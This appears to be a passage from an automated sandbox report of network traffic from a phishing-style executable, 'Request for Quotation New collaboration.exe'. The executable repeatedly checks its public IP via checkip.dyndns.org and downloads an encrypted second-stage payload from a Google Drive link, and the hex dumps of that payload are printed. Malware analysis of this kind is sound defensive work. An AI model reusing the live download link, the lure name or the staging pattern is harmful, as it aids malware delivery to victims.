                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.949835132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:28.702703953 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:30.008955002 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:29 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 639f75a1f549d74079582b7dec603a4d
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.949846132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:32.136446953 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:33.440058947 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:33 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: a816150af3b746bbd590997fb498c0ae
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.949856132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:35.610646009 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:36.913548946 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:36 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: f39f9e500c53143f116f59e50c753023
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.949866132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:39.046822071 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:40.351454973 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:40 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 416c5120c28888ca76e92f48b15e494e
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.949876132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:42.558346987 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:43.866245031 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:43 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 57287de7643538b5334f2aebf0afc639
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.949711172.217.19.1744432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:33 UTC216OUTGET /uc?export=download&id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_ HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Host: drive.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-09 07:32:34 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:34 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'nonce-5Lh2duJLIuMiN_iWXo44LQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.949712142.250.181.334432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:36 UTC258OUTGET /download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=download HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:32:39 UTC4949INHTTP/1.1 200 OK
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Content-Disposition: attachment; filename="XCsukFUMxoVWxROT123.bin"
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 94272
                                                                                                                                Last-Modified: Tue, 03 Dec 2024 08:57:07 GMT
                                                                                                                                X-GUploader-UploadID: AFiumC5dX8jlte9scTIb9v5wczLrj3D8uBGe1-mAWQKbc1vw7pr-2kqEjgt9P2WFCyNva9893MFAWIi7nA
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:39 GMT
                                                                                                                                Expires: Mon, 09 Dec 2024 07:32:39 GMT
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                X-Goog-Hash: crc32c=gAifiA==
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2024-12-09 07:32:39 UTC4949INData Raw: 64 ae 34 0f 6a d9 13 d4 42 cd 9b ee d1 78 7d 76 fe ae 46 c2 94 6b 43 29 54 35 13 1e bb ca 9c 47 ff ee db 58 df 5e 45 bf b2 33 3f 9d c7 77 eb b4 d3 8d 26 6f 97 2d 08 ee ca de 1f eb 39 3e 4b 4f 15 f8 bf f6 d1 d6 f6 40 c9 4b f3 f6 b5 88 bc ad 85 d1 77 94 6e 28 28 3c 01 02 ca d7 2e b2 69 50 a0 81 cb 5f d4 6f 3c 2d ca f4 fa 9b 43 bd c8 67 29 09 f8 c8 c1 d5 de ea 88 08 91 78 e7 9e 29 40 ad 37 84 66 27 c9 ca ec c5 b1 22 73 3f ac 91 96 7c e2 61 31 38 61 5b c7 a2 14 ee fc fa 47 e5 51 60 0d e3 89 6d 36 7e 8d d6 2f b4 89 72 6c c8 8f 3a 0b 16 d9 b3 af fc 89 2a 0e 5f b8 61 10 c8 52 77 88 8e 68 43 e6 5d ea 91 2c 2b 9d 54 96 0c 66 60 00 95 0d 02 d5 93 95 30 95 16 b8 52 71 61 a4 f2 a7 23 82 af 4a 95 03 3f 41 b8 fd 23 56 0a 01 c4 a8 31 ed 28 2f be 94 78 a1 77 a2 9b ba 5a
                                                                                                                                Data Ascii: d4jBx}vFkC)T5GX^E3?w&o-9>KO@Kwn((<.iP_o<-Cg)x)@7f'"s?|a18a[GQ`m6~/rl:*_aRwhC],+Tf`0Rqa#J?A#V1(/xwZ
                                                                                                                                2024-12-09 07:32:39 UTC4797INData Raw: 31 02 ef eb 0e 8d 04 df 0f 50 a4 b5 35 7b e5 01 7c 3c 67 d7 06 f0 41 68 38 a1 92 80 fb 6d 40 56 36 6e 08 92 52 ff 1a 0f a8 9e cd 0c fe ad f5 71 7f db 92 05 39 62 df 3f ef d6 0c b3 b1 bf 0e 99 f1 37 3e f1 8a 80 f5 15 7d 7e cc be 8c 96 ee 1f b6 76 3a 00 d5 f7 8a 1e 89 e6 4e aa 83 34 85 49 38 21 a7 2f 88 4b 20 90 75 00 e1 a8 0a a5 1d aa 48 f5 e8 00 b0 aa 93 03 3a 58 9f 47 c7 78 bf fc 64 d4 df 74 3f f7 a8 41 3b f1 4c f6 84 06 c7 e5 6b 9e 31 c0 42 d8 5c e7 e8 30 58 f6 bd c5 43 3f 9b 94 4e e9 e4 fa 31 aa 24 8c 21 a6 44 b7 62 9e 6e af 17 77 b6 2c cf a7 ed 6b 8f ec 5f 86 f4 0c fb aa ab 55 70 cc 7e 11 c7 92 85 ad a7 c2 52 a3 da 8f 4c 43 8f b5 06 bc c2 d9 9c c2 b5 25 b2 ef 5e e3 68 ee 22 eb 1a c6 de 2c d2 c2 f4 88 a4 e2 d9 f5 46 5d 9c c4 57 fd f4 37 08 55 d5 ac fc
                                                                                                                                Data Ascii: 1P5{|<gAh8m@V6nRq9b?7>}~v:N4I8!/K uH:XGxdt?A;Lk1B\0XC?N1$!Dbnw,k_Up~RLC%^h",F]W7U
                                                                                                                                2024-12-09 07:32:39 UTC1325INData Raw: fe 90 bd 83 30 de f1 d8 14 5a 14 53 cc 8a 03 25 cd 0f 51 63 67 39 88 fe 45 39 01 b6 af e1 bc 98 1b fd ab 29 84 92 22 32 96 b5 d4 e8 cc f1 ff b7 d8 18 14 7f f7 11 e3 2a 27 f2 41 71 5b 33 55 60 be 52 11 23 5e 4a 63 18 ce 95 02 66 04 fa f4 e6 1b 9c 07 37 6f 48 53 37 b4 2b e5 79 ae 0b 09 de 82 ac 07 09 9d 70 52 b9 cf b1 a5 b9 73 dc e1 b1 2e 0e 94 bc 07 1f e0 17 b0 24 28 c0 94 85 9c ee 31 b4 91 88 60 39 d6 ee d6 4a 3b 51 3d ff 5c 6c ba 92 78 0e b7 68 c9 4a f7 09 a3 6f c2 d9 e5 60 73 ed 9d 98 b1 63 39 bd 50 af 4f 91 c5 a2 ba ed f7 ec 79 e1 fe fe e2 1f 3f c1 0b cd 2e 41 0d bd 12 f5 97 c4 78 5d 1e 04 07 73 2e 23 f4 65 b2 07 7c cf 4d 01 4e e5 6e 01 f4 31 b5 bc 9a 46 0b cd bf c1 84 16 02 59 d9 52 76 fd df 8d e3 8e 40 e6 3e 6d 9a e1 ad 59 46 4d 5c cc ce 1e 98 86 61
                                                                                                                                Data Ascii: 0ZS%Qcg9E9)"2*'Aq[3U`R#^Jcf7oHS7+ypRs.$(1`9J;Q=\lxhJo`sc9POy?.Ax]s.#e|MNn1FYRv@>mYFM\a
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: d2 af 48 3c 8f 4b 95 31 7c b7 9e 9b df d3 5e af ae d9 93 cf 43 dc 74 e8 dc cd f7 f3 0e 6e a3 71 e5 18 c6 6e 42 a4 e8 f4 da 70 46 60 5e 71 8e 58 0f 6a 24 a2 99 c1 37 c8 65 6d da 4b c5 f8 a3 53 b9 0b 9d 23 dd 22 b2 02 3a bb 96 2a 58 6d 6f 6b 01 87 04 d2 60 34 a6 9d e2 7b 9b 19 6f 39 72 fa a0 61 9f 6d 2a 7d 60 96 fe 41 47 44 36 6e 08 92 52 ff 1a d1 90 b9 e5 3f d4 ac ef 62 7b d9 ba 4a 39 18 42 e2 f7 d4 0c b3 b1 a4 3e ed e9 7d 3d f5 f8 fa fe 15 1c 68 97 e6 8c 96 ee 02 52 fa 16 05 c4 f3 96 13 fa 2c 5b aa 80 1a a0 5e 40 d4 b4 3e fe 97 1b 88 07 06 84 25 7a 07 32 dc b4 eb fe 0a c0 19 99 78 a6 5c 85 c0 28 59 bf fd 45 ad 31 aa 3f fd a2 22 07 cf dd 86 eb d3 b5 95 6a 3c 64 ff 0a 06 5c e1 8d 7f b5 e0 b7 9d 6b e0 9b 9e 2b d9 c1 e2 45 74 35 8a 59 d0 a7 a0 12 90 1c 70 17
                                                                                                                                Data Ascii: H<K1|^CtnqnBpF`^qXj$7emKS#":*Xmok`4{o9ram*}`AGD6nR?b{J9B>}=hR,[^@>%z2x\(YE1?"j<d\k+Et5Yp
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: 9b 24 f5 d2 d6 f1 68 20 4b f3 fc 59 7b aa be 30 e9 9e 96 6e 28 39 30 50 0f 50 c4 20 a3 67 23 4e 81 cb 55 c7 60 2d 23 db fa 88 cb 59 bd b8 08 c2 09 f8 c2 d6 03 b1 05 88 08 9b 6b 77 8f 27 32 f7 32 3e 18 0f 33 c3 21 ee 1a 32 2e e3 94 b6 0e 15 91 4b 52 58 1f 2e da 32 79 ce 95 2c 3a 98 2f 07 3a 5b fb 9b c9 52 e3 f6 47 c9 bd 20 30 8e dd b5 61 72 cc 8e b4 e0 91 1f 1a 49 a9 72 7f 3a 52 27 c7 a8 79 1b f1 cf ca f6 16 5e 2c aa 97 1f 71 71 17 86 14 f3 cc bd 92 2d 87 5e b8 79 12 60 b3 e1 b7 23 93 bc 5d 4f 10 fb d2 aa e6 1b 40 08 01 c4 19 24 fc 33 be e1 b4 49 96 66 b6 8a a3 cb 81 b1 a7 39 c2 83 c8 ad e6 43 60 c2 ff 4e e5 71 b4 9f 22 32 9a ae 5a dd a5 15 0e d1 fd 68 43 90 88 b8 96 bc 4c 0d d0 57 0b d4 c1 be e6 46 db 2e bd 10 62 74 0b 42 b5 16 88 4d dd 6b 28 1e 21 ab 96
                                                                                                                                Data Ascii: $h KY{0n(90PP g#NU`-#Ykw'22>3!2.KRX.2y,:/:[RG 0arIr:R'y^,qq-^y`#]O@$3If9C`Nq"2ZhCLWF.btBMk(!
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: ea 89 b2 2c 65 78 9a 4f 37 21 ec 9d 8c e1 29 11 5b d6 0f 6a 35 c3 d4 84 b7 bb 39 e9 95 83 cb 32 db 4e b1 69 00 14 51 ba 40 1a 5e f6 27 1f 67 4f e2 83 e8 c2 1d 4b b6 ae e9 be a6 e1 86 e1 23 92 68 21 44 d4 a6 d1 fd e1 0f f6 a3 c1 1c 16 42 a4 78 9e 67 27 80 a7 68 59 38 06 13 47 56 39 f8 59 62 93 65 82 9f 2a 99 04 fa d4 f5 1d 8d 12 68 91 48 c9 3d a7 23 ea 3a bf 12 66 a2 f9 ea 0d 21 a3 0e 01 b3 dc b2 9c e4 07 41 eb bb 29 0e 9a bc 09 5c 10 15 cb 68 3b cb 81 a6 5c e2 20 b2 bd 91 71 31 c2 5a d6 4a 35 38 01 00 5c 66 98 a9 78 0f bd 69 e6 33 f2 18 ac 4f cf db 9e 3b 7b 82 19 b0 62 69 2a ba 41 a2 62 23 60 fd ab e5 86 83 2a e1 ff d8 c7 5a 37 b4 10 c1 26 53 64 ad 14 d9 90 c6 df 1d 90 6d 18 81 ea f9 e3 b9 3f 5e 7c cd 37 5e 49 ed 71 6e a0 27 bd 38 db 09 d1 e5 d3 cc 8d 0f
                                                                                                                                Data Ascii: ,exO7!)[j592NiQ@^'gOK#h!DBxg'hY8GV9Ybe*hH=#:f!A)\h;\ q1ZJ58\fxi3O;{bi*Ab#`*Z7&Sdm?^|7^Iqn'8
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: af e1 da 6a e5 45 45 68 e1 9e 0f 2e 22 00 bd c6 75 ac 70 11 ab e9 ed 6b a3 53 a2 18 86 41 fa fa b2 06 21 cd 9e 79 58 1d 4d a5 0e 87 0e dc 60 20 8c 4d 3f 7b 91 18 7b 05 25 fe 8d f0 47 11 ef 7f 9e 86 fe 49 35 05 45 6f 78 fd 8a ff c6 d7 9d b3 8a ec fe ad f9 75 a1 c8 bc 41 2a 65 ed f5 f9 d4 0c bb a0 b8 7c 8f f5 37 4e 9a 2d d6 fe 13 00 60 f5 38 fe e8 f8 09 38 18 fc 05 c4 f4 a0 01 80 f7 49 d8 6c a4 85 39 5d e7 a1 3e 88 26 3b 81 70 2c 01 25 0a a3 04 cd d7 fd c4 49 b6 93 96 6d b5 52 f0 49 b8 59 b5 93 65 ba 4f 7e 17 69 a8 50 3b ca d4 e7 8d 18 4b 94 73 94 50 e2 62 26 5d f2 8c 1c 53 da a1 c5 ae 3f 9b 94 30 7e 8b a5 3b aa 3f 9b 5a 8a d6 b7 12 e6 60 aa 17 73 c4 95 e4 a7 b5 e9 c8 ec 55 84 8a 98 89 36 bd 55 7e b1 ab 11 c3 e7 7e f2 a7 c8 4b 8c 77 89 23 d0 9c b0 0c bc c1
                                                                                                                                Data Ascii: jEEh."upkSA!yXM` M?{{%GI5EoxuA*e|7N-`88Il9]>&;p,%ImRIYeO~iP;KsPb&]S?0~;?Z`sU6U~~Kw#
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: b1 d6 f4 8a f4 96 bd c8 61 3a 0c e9 cd e9 46 de ea 8e 1b 99 69 6f b2 6a 46 8b 2b 3f 68 2d 12 c7 20 e4 03 4c 3a f3 8d cf d6 81 91 41 47 59 07 2d bc d7 87 cf 8c 91 38 81 28 ea 2c 92 e7 5c 4f 27 f5 de ec da a9 3c 32 9e c0 08 64 72 b6 8c ab d9 16 0e 0e 59 ab 64 10 c8 52 0c ed 8e 40 a5 e7 5e e0 2e 07 59 5e c8 8a 0c 16 0f d5 95 0d e4 ba ce 94 3b 9e 6e 04 52 17 66 b7 f7 af 32 86 dd a8 90 03 91 d2 91 7c 23 76 00 17 3a 0b 21 e8 5a cd fb 94 08 97 5f 23 9b b8 50 88 30 8b 68 c0 9b c8 ba 5b 11 40 b1 c1 58 1b 71 ba 88 46 c7 92 bf 36 6c 9d 13 1a 4a 21 71 31 bc 8c ae f5 00 78 00 d0 48 38 d9 1f cc a0 59 c8 41 0e 2b 6b 7a 26 25 90 0a f0 4b b3 6b 58 b6 1a 1d e4 b1 45 9c ee e2 6b 87 72 c0 69 58 90 07 9a b1 ad 51 3b 6f c3 54 cd d5 08 7f a3 a5 2a c7 8f fd 2a 75 e9 cd b6 1c 42
                                                                                                                                Data Ascii: a:FiojF+?h- L:AGY-8(,\O'<2drYdR@^.Y^;nRf2|#v:!Z_#P0h[@XqF6lJ!q1xH8YA+kz&%KkXEkriXQ;oT**uB
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: b1 cd 88 71 48 ae 8e 51 67 45 fe 76 fd 5e 41 39 54 aa e5 c9 98 31 07 e1 29 8e 80 de 4a 82 a6 d8 fd e8 0f b2 aa 5f 27 16 7a 78 5d 88 15 c1 e6 45 03 fb 6d 0f 69 1c 73 21 80 72 5f 69 15 20 b0 1b 73 00 58 fb fc 69 da 01 07 1d ea ec 2c a5 2e 63 5c b2 68 c2 fe f9 9a a5 21 39 0e 01 b3 dc b6 f3 e2 73 dc ef aa 25 35 de ad 03 39 6d 1a cb 62 2c c0 90 bc 48 f9 e7 ad 96 99 67 2a ab 9a 36 b4 c0 d0 6e ff 82 76 b7 ee 4b 0e bd 69 dd 57 f2 30 f4 43 cf d1 40 2a 73 c7 d8 ac 62 63 39 b7 50 af 5c 93 be ea ed ec f3 92 40 e0 fe f4 da 4b 3f c1 45 c1 26 53 10 9c 10 d9 e6 c7 03 15 2d 04 03 4a fd 3c e8 47 6a 07 7c c7 44 7e 6d e5 1a 57 e9 31 b5 bc b8 12 0d e5 4d cc 8d 0f 0e 4f e7 38 7a ff a4 c7 90 59 44 ce eb 61 92 99 f7 45 46 17 33 1e d5 2e 94 a0 43 e4 38 a4 fe 80 8a 5f 8a 41 65 4e
                                                                                                                                Data Ascii: qHQgEv^A9T1)J_'zx]Emis!r_i sXi,.c\h!9s%59mb,Hg*6nvKiW0C@*sbc9P\@K?E&S-J<Gj|D~mW1MO8zYDaEF3.C8_AeN
                                                                                                                                2024-12-09 07:32:39 UTC1390INData Raw: 58 b3 75 ce 26 b4 04 d6 6a 35 aa b5 17 29 9b 13 76 e2 63 ff a7 b1 5d 62 38 7f 9e 80 f2 52 47 5f 59 38 09 92 58 95 c7 d1 bb ab e5 3f fe e9 ff 62 7a c0 8a 53 39 1e d4 e2 f8 e7 0c b3 a0 bf 11 fb c1 ef 3e f5 f2 a4 67 30 0d 18 cc 71 8c 96 ee 03 48 71 01 fd c4 f2 b9 0e 8f df 08 ab f0 b8 83 3a e5 32 a1 38 82 3d 4c ca 69 04 e2 4a d8 a5 17 c3 e0 fd 87 d9 b0 bb 93 7b 6f 4b 99 5b aa 5e 87 eb 61 bb 4f 7c 2e fa da 38 21 d9 ad 99 51 0c b5 93 6d 96 50 ef 06 a6 40 e1 f7 62 8d f6 b7 eb 17 3b 93 8f 26 09 78 e6 3b da 5a 5f 53 a2 45 a4 17 f1 76 87 84 73 c4 b8 d7 af 8c 4b e4 af 59 a4 98 9e fb a0 ce 51 0f de 74 7e c6 e0 11 a7 8f 5c 41 a4 cd 9a 2a c7 86 a1 f2 ac d6 bc 1b c8 a3 d1 b3 82 75 f2 63 c6 47 54 b0 c6 d4 35 cb b9 80 d7 a4 e6 a1 78 44 75 79 d2 7f 7a e7 32 02 43 2b 86 cf
